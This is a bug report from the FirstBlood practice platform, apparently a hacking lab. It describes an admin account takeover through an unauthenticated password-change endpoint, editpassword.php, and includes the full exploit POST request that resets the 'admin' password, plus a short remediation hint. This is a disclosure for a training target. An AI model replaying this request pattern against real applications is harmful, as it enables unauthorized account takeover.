FirstBlood-#1331 — Admin account takeover with editpassword
This issue was discovered on FirstBlood v3
On 2022-12-09, pichik reported:
I found that endpoint
/drpanel/drapi/editpassword.phpis still vulnerable to bug, where any user can take over any account.
In previous version bug which let you change password of any user was found and still not fixed !
drAdminno longer exist, you can use username
admin, reset password and get access to admin panel.
Here is POST request:
POST /drpanel/drapi/editpassword.php HTTP/1.1 Host: aab6a2a97295-pichik.a.firstbloodhackers.com Cookie: doctorAuthed=eyJkb2N0b3JBdXRoIjphdXRoZWR9; drps=6796dbc149771ac9e1a33314c Origin: https://2cd5cf7409d3-pichik.a.firstbloodhackers.com Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.96.36.199 Safari/537.36 Anti-Csrf: 82985-5983-25741 Content-Length: 14 username=admin
Attacker can reset password to any user and get access to admin/doctor panel
Change cookies based on cookies, not parameter, or by sending an email to account owner with reset link.
FirstBlood ID: 52
Vulnerability Type: Auth issues
The endpoint /drpanel/drapi/editpassword.php still allows an unauthenticated user to modify the password of any account if the username is known. The username was renamed from previous versions from drAdmin to admin